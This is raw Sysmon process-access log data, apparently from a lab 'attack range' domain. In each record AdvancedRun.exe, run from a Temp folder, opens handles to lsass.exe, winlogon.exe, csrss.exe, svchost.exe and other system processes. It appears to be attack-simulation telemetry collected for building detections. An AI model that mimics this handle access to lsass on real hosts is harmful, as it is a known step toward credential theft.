18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009366Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009363Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004009362Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004009361Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009360Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009359Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009357Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009356Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 